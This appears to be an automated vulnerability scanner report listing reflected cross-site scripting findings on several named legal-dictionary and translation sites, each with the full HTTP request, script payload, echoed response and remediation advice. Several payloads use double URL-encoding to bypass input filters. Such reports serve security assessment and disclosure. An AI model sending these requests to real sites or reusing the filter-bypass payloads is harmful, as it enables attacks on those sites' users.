The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b4f76<script>alert(1)</script>a9e2e27fca5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Anger_Managementb4f76<script>alert(1)</script>a9e2e27fca5/x22 HTTP/1.1 Host: massachusetts.uscity.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden Date: Mon, 29 Nov 2010 17:10:05 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 7276
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD><TITLE>403 Forbidden</TITLE> <META content="403 Forbidden" name=description> <META content=TRUE name=MSSmartTagsPreventParsing>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6cb19<script>alert(1)</script>ff68e9debd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Anger_Management/x226cb19<script>alert(1)</script>ff68e9debd3 HTTP/1.1 Host: massachusetts.uscity.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden Date: Mon, 29 Nov 2010 17:10:05 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 7276
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD><TITLE>403 Forbidden</TITLE> <META content="403 Forbidden" name=description> <META content=TRUE name=MSSmartTagsPreventParsing>
1.37. http://massachusetts.uscity.net/Anger_Management/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://massachusetts.uscity.net
Path:
/Anger_Management/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e5217<script>alert(1)</script>4e2be8e118b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Anger_Management/x22?e5217<script>alert(1)</script>4e2be8e118b=1 HTTP/1.1 Host: massachusetts.uscity.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden Date: Mon, 29 Nov 2010 17:10:04 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 7279
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD><TITLE>403 Forbidden</TITLE> <META content="403 Forbidden" name=description> <META content=TRUE name=MSSmartTagsPreventParsing>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51a3d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef51fe0d5580 was submitted in the REST URL parameter 1. This input was echoed as 51a3d"><script>alert(1)</script>f51fe0d5580 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Canadian-Insolvency-Dictionary51a3d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef51fe0d5580/ HTTP/1.1 Host: miscellaneous.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:08 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 25412
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a75a6%2527%253balert%25281%2529%252f%252fa63430848df was submitted in the REST URL parameter 1. This input was echoed as a75a6';alert(1)//a63430848df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Canadian-Insolvency-Dictionarya75a6%2527%253balert%25281%2529%252f%252fa63430848df/ HTTP/1.1 Host: miscellaneous.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:19 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 23779
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... define').term.value; } if (document.myform.operation[2] && document.myform.operation[2].checked == true) { var loc = 'http://miscellaneous.legaldictionaries.org/Canadian-Insolvency-Dictionarya75a6';alert(1)//a63430848df/' + document.getElementById('define').term.value; } } var myExp = /\s/g; var loc2 = loc.replace(myExp,"_"); location = loc2; }
function bar(e){ var keycode; if (window.event) keycod ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8aa42%253cscript%253ealert%25281%2529%253c%252fscript%253ed0bd9f4ed96 was submitted in the REST URL parameter 1. This input was echoed as 8aa42<script>alert(1)</script>d0bd9f4ed96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Canadian-Insolvency-Dictionary8aa42%253cscript%253ealert%25281%2529%253c%252fscript%253ed0bd9f4ed96/ HTTP/1.1 Host: miscellaneous.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:34 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 25059
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 908fb%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30364464e3d was submitted in the REST URL parameter 1. This input was echoed as 908fb</title><script>alert(1)</script>30364464e3d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Canadian-Insolvency-Dictionary908fb%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30364464e3d/ HTTP/1.1 Host: miscellaneous.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:16:16 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 25777
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8f70%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed3a061e205b was submitted in the REST URL parameter 1. This input was echoed as f8f70"><script>alert(1)</script>d3a061e205b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /OJJDPs-Performance-Measures-Glossaryf8f70%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed3a061e205b/ HTTP/1.1 Host: miscellaneous.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:08 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 25742
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 1cb97%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e162a0461be7 was submitted in the REST URL parameter 1. This input was echoed as 1cb97</title><script>alert(1)</script>162a0461be7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /OJJDPs-Performance-Measures-Glossary1cb97%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e162a0461be7/ HTTP/1.1 Host: miscellaneous.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:16:16 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 26119
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b324%253cscript%253ealert%25281%2529%253c%252fscript%253ecfa6a8c3e5b was submitted in the REST URL parameter 1. This input was echoed as 3b324<script>alert(1)</script>cfa6a8c3e5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /OJJDPs-Performance-Measures-Glossary3b324%253cscript%253ealert%25281%2529%253c%252fscript%253ecfa6a8c3e5b/ HTTP/1.1 Host: miscellaneous.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:36 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 25392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56e8a%2527%253balert%25281%2529%252f%252fae83389a4c9 was submitted in the REST URL parameter 1. This input was echoed as 56e8a';alert(1)//ae83389a4c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /OJJDPs-Performance-Measures-Glossary56e8a%2527%253balert%25281%2529%252f%252fae83389a4c9/ HTTP/1.1 Host: miscellaneous.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:24 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 24121
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... ').term.value; } if (document.myform.operation[2] && document.myform.operation[2].checked == true) { var loc = 'http://miscellaneous.legaldictionaries.org/OJJDPs-Performance-Measures-Glossary56e8a';alert(1)//ae83389a4c9/' + document.getElementById('define').term.value; } } var myExp = /\s/g; var loc2 = loc.replace(myExp,"_"); location = loc2; }
function bar(e){ var keycode; if (window.event) keycod ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1e77%2527%253balert%25281%2529%252f%252f45ee6a063d0 was submitted in the REST URL parameter 1. This input was echoed as b1e77';alert(1)//45ee6a063d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Presidents-DNA-Initiative-Glossaryb1e77%2527%253balert%25281%2529%252f%252f45ee6a063d0/ HTTP/1.1 Host: miscellaneous.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:24 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 24006
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... ne').term.value; } if (document.myform.operation[2] && document.myform.operation[2].checked == true) { var loc = 'http://miscellaneous.legaldictionaries.org/Presidents-DNA-Initiative-Glossaryb1e77';alert(1)//45ee6a063d0/' + document.getElementById('define').term.value; } } var myExp = /\s/g; var loc2 = loc.replace(myExp,"_"); location = loc2; }
function bar(e){ var keycode; if (window.event) keycod ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload af771%253cscript%253ealert%25281%2529%253c%252fscript%253e25a8a2e4717 was submitted in the REST URL parameter 1. This input was echoed as af771<script>alert(1)</script>25a8a2e4717 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Presidents-DNA-Initiative-Glossaryaf771%253cscript%253ealert%25281%2529%253c%252fscript%253e25a8a2e4717/ HTTP/1.1 Host: miscellaneous.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:37 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 25286
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... </script>25a8a2e4717/">Presidents DNA Initiative Glossaryaf771<script>alert(1)</script>25a8a2e4717</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 36fa8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb86f565e2de was submitted in the REST URL parameter 1. This input was echoed as 36fa8</title><script>alert(1)</script>b86f565e2de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Presidents-DNA-Initiative-Glossary36fa8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb86f565e2de/ HTTP/1.1 Host: miscellaneous.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:16:16 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 26011
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eae1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb04dda35403 was submitted in the REST URL parameter 1. This input was echoed as 2eae1"><script>alert(1)</script>b04dda35403 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Presidents-DNA-Initiative-Glossary2eae1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb04dda35403/ HTTP/1.1 Host: miscellaneous.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:08 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 25639
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d617%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ca2ecd654d was submitted in the REST URL parameter 1. This input was echoed as 3d617"><script>alert(1)</script>6ca2ecd654d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /SBB-Glossary3d617%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ca2ecd654d/ HTTP/1.1 Host: miscellaneous.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:09 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 24451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 11e68%253cscript%253ealert%25281%2529%253c%252fscript%253e97eb451e3db was submitted in the REST URL parameter 1. This input was echoed as 11e68<script>alert(1)</script>97eb451e3db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /SBB-Glossary11e68%253cscript%253ealert%25281%2529%253c%252fscript%253e97eb451e3db/ HTTP/1.1 Host: miscellaneous.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:36 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 24098
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5648%2527%253balert%25281%2529%252f%252f56e2f4ce48f was submitted in the REST URL parameter 1. This input was echoed as b5648';alert(1)//56e2f4ce48f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /SBB-Glossaryb5648%2527%253balert%25281%2529%252f%252f56e2f4ce48f/ HTTP/1.1 Host: miscellaneous.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:24 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 22796
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... t.getElementById('define').term.value; } if (document.myform.operation[2] && document.myform.operation[2].checked == true) { var loc = 'http://miscellaneous.legaldictionaries.org/SBB-Glossaryb5648';alert(1)//56e2f4ce48f/' + document.getElementById('define').term.value; } } var myExp = /\s/g; var loc2 = loc.replace(myExp,"_"); location = loc2; }
function bar(e){ var keycode; if (window.event) keycod ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload e8bd9%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef9f7d1e6433 was submitted in the REST URL parameter 1. This input was echoed as e8bd9</title><script>alert(1)</script>f9f7d1e6433 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /SBB-Glossarye8bd9%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef9f7d1e6433/ HTTP/1.1 Host: miscellaneous.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:16:16 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 24816
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of the affiliate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e7eb"><script>alert(1)</script>55d37153589 was submitted in the affiliate parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /trans_box/tbv2.php?lang=EN&affiliate=CD41007e7eb"><script>alert(1)</script>55d37153589&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword= HTTP/1.1 Host: online.babylon.com Proxy-Connection: keep-alive Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:59:18 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html Content-Length: 5459
<!-- version server --><!--old var isnt set --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the affiliate request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87680'%3balert(1)//2dfc2e7522a was submitted in the affiliate parameter. This input was echoed as 87680';alert(1)//2dfc2e7522a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /trans_box/tbv2.php?lang=EN&affiliate=CD410087680'%3balert(1)//2dfc2e7522a&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword= HTTP/1.1 Host: online.babylon.com Proxy-Connection: keep-alive Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
